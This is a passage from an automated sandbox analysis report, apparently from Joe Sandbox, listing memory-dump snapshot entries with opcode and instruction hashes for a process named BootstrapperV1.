                                              • Opcode Fuzzy Hash: 64603d2f3182047def694b297d4e48964e10522ed70966eae7291ddd1e0f43fe
                                              • Instruction Fuzzy Hash: 6C01A721B28E4E4BD7ECEB1C9460EB6B3E1FF94300785467AD009C3199DE25E8418780
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9ec7ecddc0a717cbeda37ca76a0aeef29b12f6de8e97513ccbc9eb6a1b04e602
                                              • Instruction ID: 3c73a1f8296fe009d58887ef4f24fe29bf33722db54b900a71f413ae748dc09e
                                              • Opcode Fuzzy Hash: 9ec7ecddc0a717cbeda37ca76a0aeef29b12f6de8e97513ccbc9eb6a1b04e602
                                              • Instruction Fuzzy Hash: 08F0243271EE0D0FABACE19D602863263C6DBE8266716023FD84DC32B0DC14DC034350
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5139e2afcfb3b265a2f6b0757ff13012f0c3f6580357ef9c591e6c6757e44e3
                                              • Instruction ID: aacaf72f04fbcdc2a01e516f023aeaeebc092bbb0e7eaec1d7ee7c43e688e142
                                              • Opcode Fuzzy Hash: c5139e2afcfb3b265a2f6b0757ff13012f0c3f6580357ef9c591e6c6757e44e3
                                              • Instruction Fuzzy Hash: EC017120B0DE5A0FEB78966C94A85B673F1EF95320F15037EC09AC71F5DD29A9868341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01d083471cf2c285c42bcf8c60c2284bda4ff7ab6d77073435e2ee4bced97a70
                                              • Instruction ID: 752c4e0f741ca1394e902b2b9a821ab4ff2ecb1e7d68f462053764315c35b602
                                              • Opcode Fuzzy Hash: 01d083471cf2c285c42bcf8c60c2284bda4ff7ab6d77073435e2ee4bced97a70
                                              • Instruction Fuzzy Hash: 8901B520B0EE1A0FEB78966994B857673F1EF95320F15037FC09B871F5DD29A5428341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f78b4773b6eb6c194bb441f5c10739ce66a05e743fbc9950d7538beb6305da0e
                                              • Instruction ID: 8093110df3795303dd78310a4d631848bc0222dda70aaa215a822b6bcbc726da
                                              • Opcode Fuzzy Hash: f78b4773b6eb6c194bb441f5c10739ce66a05e743fbc9950d7538beb6305da0e
                                              • Instruction Fuzzy Hash: 8201B520B0EE0A0FEB78966894A457673F1EFA5320F15037FC09B871F5DD29A942C341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae4addc630e82c8e24d080c4d7bd7bf403ab8159d61d4c13d8b0b0e11af254fa
                                              • Instruction ID: fb92c9b7cf2fdf3ee172faab973f4afe27b59fdd11632a8ab4b5952ffa56591b
                                              • Opcode Fuzzy Hash: ae4addc630e82c8e24d080c4d7bd7bf403ab8159d61d4c13d8b0b0e11af254fa
                                              • Instruction Fuzzy Hash: CD01D69271DE8A0FE799E36C6071AE5A7E1EFB925074947FBC05AC319ADC18A8438340
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 054f1615c87ec83c2f0a94a48fa13b05e1f4f4c866a3796e6b7b1255c12498d4
                                              • Instruction ID: 692af545fba737d7d18c084cfb1138257f0a542dd32146572865d5ffd65e510c
                                              • Opcode Fuzzy Hash: 054f1615c87ec83c2f0a94a48fa13b05e1f4f4c866a3796e6b7b1255c12498d4
                                              • Instruction Fuzzy Hash: E1012651B0FFC90EE365A72C54742B57BD1AF96360F4A12BBC0C9C71E6DD0869828351
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7889381f3f662bc0bba5efce29d4a0f8101d2902d378d0e7bf8fc39401c6122e
                                              • Instruction ID: 733fdf104c0aa73763374bff7c4df9fd346e33f1daf6b7aa5b2d1073ae7ef4dc
                                              • Opcode Fuzzy Hash: 7889381f3f662bc0bba5efce29d4a0f8101d2902d378d0e7bf8fc39401c6122e
                                              • Instruction Fuzzy Hash: F3F0FC52B0FB8D0FE3A681BD28A52B46BC5DB9526070A02FBD04DC72B7DC445D8643A2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7461377af2701bf9a410400e39913399b709438d36ee4d6b1edb91f885ae96e4
                                              • Instruction ID: 3b22bd04533261d0aa5df4e4ef34c02dd1afa21d7e91bd7b110d579298917164
                                              • Opcode Fuzzy Hash: 7461377af2701bf9a410400e39913399b709438d36ee4d6b1edb91f885ae96e4
                                              • Instruction Fuzzy Hash: 53018105E5FBCA1ED76363B81C301A27FA49E4712470A0AE7D4C8CA1FBE80C5A56C352
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 89607630703678534abe152ed881063de7b863cb15908d9c8fc7e6bc70a19728
                                              • Instruction ID: 76415481f626913473f7c957934d0bfafbf11939d5217ae7b94b7dc554fa3d20
                                              • Opcode Fuzzy Hash: 89607630703678534abe152ed881063de7b863cb15908d9c8fc7e6bc70a19728
                                              • Instruction Fuzzy Hash: 4C012A7170DA098FE7A8DA68C0A5BA577E1BF44300F01466EC0DAC72B2DA24B901DB50
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f9303ea5f9bca01c438bb049fce267cdb9e8d254345b7e531b4f81fa59c9d51
                                              • Instruction ID: 0b9ddb6a8b19a060c495b645ccf19c14791b4ad430e204c9272f1fb4a6a26298
                                              • Opcode Fuzzy Hash: 0f9303ea5f9bca01c438bb049fce267cdb9e8d254345b7e531b4f81fa59c9d51
                                              • Instruction Fuzzy Hash: 81F0F671A5DB454BD30C9F08B4428F9B3D0EB85328F50066FE08E4219BDE36E147868A
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a612f36af581d4348748d328e691d0427e0adf155c53aa442ce621044b26c364
                                              • Instruction ID: a3b886554d2eab3c118689277ea79af3023682bdb39ad243c7a8c76d8200de7e
                                              • Opcode Fuzzy Hash: a612f36af581d4348748d328e691d0427e0adf155c53aa442ce621044b26c364
                                              • Instruction Fuzzy Hash: 64F0BE42F0FB8E0FD2A6526C28601A82B91EBA5550B8A02A7C8C8C72F7DC4C5D464382
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 77292e71237b7b53889f7534871506d14eb6d78a389af64a1e132d7aa2283de3
                                              • Instruction ID: e099804090793c338fdd7dc37fdff7c0fcc044576b6f2e643425388298fac38f
                                              • Opcode Fuzzy Hash: 77292e71237b7b53889f7534871506d14eb6d78a389af64a1e132d7aa2283de3
                                              • Instruction Fuzzy Hash: F7F02E3170EA0F0EE674928DA46977176C5EF89374F162276E54DC33B2ED486D428360
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 527466508a3aa0fd7bf1e3ecd9fed574375d603e7292f83f0fc5fb176a97a038
                                              • Instruction ID: aa89a3d97d74b2f477ebb50071809f531692d928f022a033072d64e32a8cd4d0
                                              • Opcode Fuzzy Hash: 527466508a3aa0fd7bf1e3ecd9fed574375d603e7292f83f0fc5fb176a97a038
                                              • Instruction Fuzzy Hash: 2EF0B411B1EB0E1FE7A8AAAC24655BDB2C1EB88211BC2257BD44EC61A7EC5E9D414341
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 55cd0be3b5252abe26a9b7a0d31c61cb47ff933143bb7e8b1a86160d6da4b990
                                              • Instruction ID: 0a89d3afa0a7f6293b052a12cc3139a053cb1a5af246a6837eb9d46ef0ba92c9
                                              • Opcode Fuzzy Hash: 55cd0be3b5252abe26a9b7a0d31c61cb47ff933143bb7e8b1a86160d6da4b990
                                              • Instruction Fuzzy Hash: 39F0A450F1EB5E1AFAB492A850303F97182AF84714F4603BBD49E932F1DE5C6B82C381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1bca072be8463be6cd6185bfd594bd6fda7af37bfae550ae75fb55e7c523f306
                                              • Instruction ID: ea887fcc5530dc570f2ef91ea5640d7d7f129db7b3f74e53639873ece95e6809
                                              • Opcode Fuzzy Hash: 1bca072be8463be6cd6185bfd594bd6fda7af37bfae550ae75fb55e7c523f306
                                              • Instruction Fuzzy Hash: 4F01AD30919BCE4FDB86EF6888284E9BFB0FF1A200B4508EBD499C71A2DA7455148741
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3cfa5fce1b7684d10e58f8df4861ba96b16afc495c290607424fac97157526e4
                                              • Instruction ID: 0c52406d3d4d238a160a58c345e2042316f464193fdbc3be91bafe36eff38f43
                                              • Opcode Fuzzy Hash: 3cfa5fce1b7684d10e58f8df4861ba96b16afc495c290607424fac97157526e4
                                              • Instruction Fuzzy Hash: 70F0FE71A2CB088B9F54AE4CBC434ED77D0FB98B20F10126FF94943251D621B9928AC7
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a69a81cfd7be729bcb1576e61d2b1a42c8d8228276c3290f9c6277d2a0d1e8ec
                                              • Instruction ID: 25f44b428488cc925056bc477b15e7cc692bcaef047032dab5a90740f42e72ef
                                              • Opcode Fuzzy Hash: a69a81cfd7be729bcb1576e61d2b1a42c8d8228276c3290f9c6277d2a0d1e8ec
                                              • Instruction Fuzzy Hash: 13F0A772B1DB1D0FE658AA0C68531B873D2EB89660714427FD48FC31A3DC256A074385
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8f41638cebe9ab0e0c11a9db7a25fe3a2ff5456ad896b9bec79bbe5d4f7d8e08
                                              • Instruction ID: a357211d8459da434b58973b1a754312ffb1d6fcfd18c03795f7bf7474179850
                                              • Opcode Fuzzy Hash: 8f41638cebe9ab0e0c11a9db7a25fe3a2ff5456ad896b9bec79bbe5d4f7d8e08
                                              • Instruction Fuzzy Hash: 2EF02E12B1EE4E0AEAE8B35C94709F863C1DF94164B450377D04DC31B5DC08B9420340
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25e88686572a07bf539dbee89be273223c68d8c66e86fe9bbfa5e60c28040f61
                                              • Instruction ID: 2304cbb4eac34237cce612318ee36987d121cf02b3a263de1ef8a5bc7fab62a3
                                              • Opcode Fuzzy Hash: 25e88686572a07bf539dbee89be273223c68d8c66e86fe9bbfa5e60c28040f61
                                              • Instruction Fuzzy Hash: A2F0C821A0E78A1FE36A976C94656A47BE1EF45310B4A02F7E448CB1B3D91CE9858361
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f89d82e3d3c7aec9349276ce7282485704f454e3a15025c96891d9169b39d1a9
                                              • Instruction ID: 1dfdbdea56760336d5f579c3828bf76d44a99da8f1ffc45fdfb31d31a1d7ef84
                                              • Opcode Fuzzy Hash: f89d82e3d3c7aec9349276ce7282485704f454e3a15025c96891d9169b39d1a9
                                              • Instruction Fuzzy Hash: EEF0EC12B19D1D0AD9F8B31C94649F963D2DFD4260B410777D44DC32A9DC08A9434380
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 21197feed9806200dae10abc680328888bb4b1dfe8d50e4fa290c73995b0512f
                                              • Instruction ID: ad0b30ed1ec9072d29cbf2362f501c35f987207e2e487b027ac696409c612b09
                                              • Opcode Fuzzy Hash: 21197feed9806200dae10abc680328888bb4b1dfe8d50e4fa290c73995b0512f
                                              • Instruction Fuzzy Hash: 9A01AD60A0E2C60EF32A96B868757B63BE09F83314F1904FED09A8B2F3CD4D28458201
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e5fe486239f89b8598cabd0a45bea07d737394280d99f59b0c508cd8ed0e4c97
                                              • Instruction ID: 3e18856a7f737300d147b6acde1bde1237887109e16e2a5f12f2258bc8118bb2
                                              • Opcode Fuzzy Hash: e5fe486239f89b8598cabd0a45bea07d737394280d99f59b0c508cd8ed0e4c97
                                              • Instruction Fuzzy Hash: 13F05C3170AE0D1AD6B4A61C6064BFA33D1DBD8320F41023AE40EC33E5DD1869828390
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7a0bae7478be82d509fd4467fbf4df66cfdc8a1c76291e21d41b6ef0b863331c
                                              • Instruction ID: d0b8222ec0c72d26079c7ad739bb2bb6643cad353c10b12da2d20c382041d1f4
                                              • Opcode Fuzzy Hash: 7a0bae7478be82d509fd4467fbf4df66cfdc8a1c76291e21d41b6ef0b863331c
                                              • Instruction Fuzzy Hash: 96F02711B0EF5D0BFBB4A1E9646937676C5DF95224F05033BD448C11F2CE6A3A868381
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3d7cb84b8767e2b860f19f408c2db4399f3acc2c9abbba5595fc727a4d2ce4f8
                                              • Instruction ID: 74c87f878895491bef3ec4ecb8007da7c916f12ff8b5d9ea3170ec8df943cb18
                                              • Opcode Fuzzy Hash: 3d7cb84b8767e2b860f19f408c2db4399f3acc2c9abbba5595fc727a4d2ce4f8
                                              • Instruction Fuzzy Hash: 38F03030708A1D4FDBD4EE5CC495B6533D2EF58700B0485B5984DCF26BDD24EC418760
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1db69b7646c5eceed319c8bde9becf8a101cd13c51aa502f5827edd252ecc93
                                              • Instruction ID: 2c0510f98541d95a406dcf778cd0799d0dbcef85e76f2d255ebbba9826456ff6
                                              • Opcode Fuzzy Hash: e1db69b7646c5eceed319c8bde9becf8a101cd13c51aa502f5827edd252ecc93
                                              • Instruction Fuzzy Hash: 31F06D3270C90D8F8F88EF18D451DEAB3A1FBA832071011A6E00EC3156DA31E852CBC0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6c38397b0080fbdd5f1c6bdac99ee6db7379739e1459ad264a73e8edf7146cff
                                              • Instruction ID: 9ff9f86cc0bda9b4eae72372cdfc56bdd031bb6e5828214d9ea48fd33afee713
                                              • Opcode Fuzzy Hash: 6c38397b0080fbdd5f1c6bdac99ee6db7379739e1459ad264a73e8edf7146cff
                                              • Instruction Fuzzy Hash: 40E0D802B1DE5D1AD174927D2C547751586C7C9170B1803FBD81DC22E9DC042D4543E1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cea4e010edb66e9937f4d88a423b7b790a512e3d6084df68a0f53cb853c6be87
                                              • Instruction ID: 2789e2f2ee48c40fd0400457e04e191555ac3e9881d35e5ee992dc03da02bf49
                                              • Opcode Fuzzy Hash: cea4e010edb66e9937f4d88a423b7b790a512e3d6084df68a0f53cb853c6be87
                                              • Instruction Fuzzy Hash: CCF020A1A1F38A0FDBA3ABB464709B83BA0DF56714B0209FAC094CB0F7DD0A2448C201
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 97f5564434af709636c7c9aa46cd3e0aee56755097ae467c9d8481721b23585d
                                              • Instruction ID: ebb5a3422e034615f3cd45e861eb45f6503a34296fe15dfabf209c2af3b78b1f
                                              • Opcode Fuzzy Hash: 97f5564434af709636c7c9aa46cd3e0aee56755097ae467c9d8481721b23585d
                                              • Instruction Fuzzy Hash: 8DE0D621B0AA2D4FCAB4EF1C9824B7437E1EF0878030206EAE48EC72F1D900AD088390
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd838e136d1ccbd5c4580bffd999afc76efd96bf6582ea4d3879e496f6491c1a
                                              • Instruction ID: d2b6a9ee339e56c6f9747e62c870a269beb8bb6aaa3bf0a5f5da155512a2fa24
                                              • Opcode Fuzzy Hash: cd838e136d1ccbd5c4580bffd999afc76efd96bf6582ea4d3879e496f6491c1a
                                              • Instruction Fuzzy Hash: 6FE0D83170860A4FE73CD744D4A06F47352EBD1320F11477BC44AC62F4DD18E9864740
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18ba18a943ee4dd1e0716ccb17947207b2c0a5ac732912e0e0b1e0b67193fad7
                                              • Instruction ID: 50506679eb8ee350f41776729423c176c5d1ee0d99a7621163138bc1cc5a1ca5
                                              • Opcode Fuzzy Hash: 18ba18a943ee4dd1e0716ccb17947207b2c0a5ac732912e0e0b1e0b67193fad7
                                              • Instruction Fuzzy Hash: A9D05B11F1BE1E1AD0B4726C283526A2481DFC8620B460773EC4CC32FDEC589E8102C0
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c77aefd38172679a27e96616c87001a02266711ada9c3cef4cbb18d4a0944f12
                                              • Instruction ID: 3c0b264ecae5c5e2414e70283fc091954335012f8a6f4db25ac4600c85d6b265
                                              • Opcode Fuzzy Hash: c77aefd38172679a27e96616c87001a02266711ada9c3cef4cbb18d4a0944f12
                                              • Instruction Fuzzy Hash: E1E02B21F0FE4E07DE9CA8765C7662031D1FFE9204BDA00A9C45CC61A2FD8AD9928301
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a6e9609f414b2c6dee6a9b60682e59ddfd1caf386be40e54ae2b86e41f9fbf4b
                                              • Instruction ID: f4af435d66d134de57f89709cbcb8d18712cdb03b26609f2005bc9575a7744be
                                              • Opcode Fuzzy Hash: a6e9609f414b2c6dee6a9b60682e59ddfd1caf386be40e54ae2b86e41f9fbf4b
                                              • Instruction Fuzzy Hash: 62E0C220A19B4A07E714FA724C4527A71D2BB88205FC64B76D88CC10B0FA2CC3C84262
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 258aebc614e8d45470a5f80dc5a80f5e356d23fff13c83d26b88d9e2362c91ea
                                              • Instruction ID: d39a30428f15f889af1d5dbabeb502c25283c21c750c62a016b308e8da841aa2
                                              • Opcode Fuzzy Hash: 258aebc614e8d45470a5f80dc5a80f5e356d23fff13c83d26b88d9e2362c91ea
                                              • Instruction Fuzzy Hash: 9ED0A711B1DE1D0FA2D4AA9C74D05F9A281E7981203801737C00AC229ECC5859464340
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0c8648218ce9efc928c5b46172d12a4b80372b845893b39bd118ba0729803c41
                                              • Instruction ID: f66fad9f73c4f483718c07f405aa64164f93b409b756b7857c48c82ee58ecdc2
                                              • Opcode Fuzzy Hash: 0c8648218ce9efc928c5b46172d12a4b80372b845893b39bd118ba0729803c41
                                              • Instruction Fuzzy Hash: DED02E30B2DA1C0AEBB0BAA850297F933D0CB44354F050B37EC0CF62B0ED489B8142D1
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2125820520.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_7ffd9b700000_BootstrapperV1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75261d37e021c448ce7a6cdf38988fe9b764c51e423080561eedaeb09bca561a
                                              • Instruction ID: 1ac08401c76368936e7270f6f013625f7c315e691a2313460068f6481d0aeefc
                                              • Opcode Fuzzy Hash: 75261d37e021c448ce7a6cdf38988fe9b764c51e423080561eedaeb09bca561a
                                              • Instruction Fuzzy Hash: 64D05B31A0A95C0FDAB4DB6D94645647BD0FF18A0070611DBD89CC72B1D945ADC14341
                                              Memory Dump Source
